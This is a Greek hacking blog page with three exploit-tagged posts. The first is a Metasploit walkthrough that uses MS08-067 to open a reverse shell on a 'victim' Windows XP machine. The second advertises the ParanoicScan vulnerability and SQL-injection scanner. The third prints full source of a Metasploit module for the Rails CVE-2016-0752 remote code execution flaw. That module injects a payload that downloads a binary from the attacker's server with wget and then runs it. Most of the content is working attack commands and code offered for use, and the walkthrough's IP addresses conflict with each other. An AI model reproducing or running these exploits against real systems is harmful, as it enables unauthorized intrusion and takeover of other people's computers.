Web Analytics Made Easy - StatCounter
FoulsCode

Εμφάνιση αναρτήσεων με ετικέτα exploit. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα exploit. Εμφάνιση όλων των αναρτήσεων

18 Ιανουαρίου 2017

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit



Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.




Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack


Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="">
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.130 <- attacker="" ip="" span="">
LHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > exploit <- span="">

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

GAME OVER!!!

Όπως φαίνεται παραπάνω μπήκαμε στον υπολογιστή του θύματος μας και έχουμε μπροστά μας το μενού εντολών του MS-DOS... Από εκεί και πέρα μπορούμε να κάνουμε ότι θέλουμε αρκεί να γνωρίζουμε έστω και λίγες εντολές του MS-DOS.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

via: securitydnainfo.blogspot.gr
Διαβάστε Περισσότερα »

2 Ιανουαρίου 2017

ParanoicScan



Vulnerability Scanner

As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.


[++] Old Options


Google & Bing Scanner that also scan :

XSS

SQL GET / POST

SQL GET

SQL GET + Admin

Directory listing

MSSQL

Jet Database

Oracle

LFI

RFI

Full Source Discloure

HTTP Information

SQLi Scanner

Bypass Admin

Exploit FSD Manager

Paths Finder

IP Locate

Crack MD5

Panel Finder

Console


[++] Fixes


[+] Refresh of existing pages to crack md5
[+] Error scanner fsd
[+] Http error scanner scan
[+] Spaces between text too annoying
[+] Added array to bypass
[+] Failed to read from file


[++] New options


[+] Generate all logs in a html file
[+] Incorporates random and new useragent
[+] Multi encoder / decoder :

Ascii

Hex

Url

Bin To Text & Text To Bin


[+] PortScanner
[+] HTTP FingerPrinting
[+] CSRF Tool
[+] Scan XSS
[+] Generator for XSS Bypass
[+] Generator links to tiny url
[+] Finder and downloader exploits on Exploit-DB
[+] Mysql Manager
[+] Tools LFI


An image :



An video :

Available for download here :


https://github.com/DoddyHackman/ParanoicScan
https://code.google.com/p/paranoicscan/source/browse/
https://sourceforge.net/projects/paranoicscan/?source=directory
http://pastebin.com/yKfJhCT2


Perl Updated a year ago
Python/ParanoicScan 0.4 Updated a year ago
Zip Updated a year ago
.gitattributes Vulnerability Scanner 3 years ago
.gitignore Vulnerability Scanner 3 years ago
README.md

Good Bye
Διαβάστε Περισσότερα »

14 Οκτωβρίου 2016

Ruby on Rails Dynamic Render File Upload Remote Code Execution


This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.

MD5 | 330df82eae0981c2ca7cc8777a63a53c


require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper
def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example:
def show render params[:id] end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution. }, 'Author' => [ 'mr_me ', # necromanced old bug & discovered new vector rce vector 'John Poulin (forced-request)' # original render bug finder ], 'References' => [ [ 'CVE', '2016-0752'], [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit ], 'License' => MSF_LICENSE, 'Platform' => ['linux', 'bsd'], 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true, }, 'Privileged' => false, 'Targets' => [ [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2016')) register_options( [ Opt::RPORT(3000), OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), ], self.class) end
def check
# this is the check for the dev environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), 'method' => 'GET', }, 60)
# if the page controller is dynamically rendering, its for sure vuln if res and res.body =~ /render params/ return CheckCode::Vulnerable end
# this is the check for the prod environment res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), 'method' => 'GET', }, 60)
# if we can read files, its likley we can execute code if res and res.body =~ /ruby/ return CheckCode::Appears end return CheckCode::Safe end
def on_request_uri(cli, request) if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end
def send_payload @bd = rand_text_alpha(8+rand(8)) fn = rand_text_alpha(8+rand(8)) un = rand_text_alpha(8+rand(8)) pn = rand_text_alpha(8+rand(8)) register_file_for_cleanup("/tmp/#{@bd}") cmd = "wget #{@service_url} -O /tmp/#{@bd};" cmd << "chmod 755 /tmp/#{@bd};" cmd << "/tmp/#{@bd}" pay = "<%=`#{cmd}`%>" print_status("uploading image...") data = Rex::MIME::Message.new data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, 'uri' => normalize_uri(datastore['URIPATH'], pn), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s }) if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ return true else
# this is where we pull the log file if leak_log return true end end return false end
def leak_log
# path to the log /proc/self/fd/7 # this bypasses the extension check res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), 'method' => 'GET', }, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ return true end return false end
def start_http_server @pl = generate_payload_exe @elf_sent = false downfile = rand_text_alpha(8+rand(8)) resource_uri = '/' + downfile if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end
# do not use SSL for the attacking web server if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" service_url_payload = srv_host + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore connect end
def render_tmpfile @path.gsub!(/\//, '%2f') res = send_request_cgi({ 'uri' => normalize_uri(datastore['URIPATH'], @path), 'method' => 'GET', }, 1) end
def exploit print_status("Sending initial request to detect exploitability") start_http_server if send_payload print_good("injected payload") render_tmpfile
# we need to delay, for the stager select(nil, nil, nil, 5) end endend
Διαβάστε Περισσότερα »
Related Posts Plugin for WordPress, Blogger...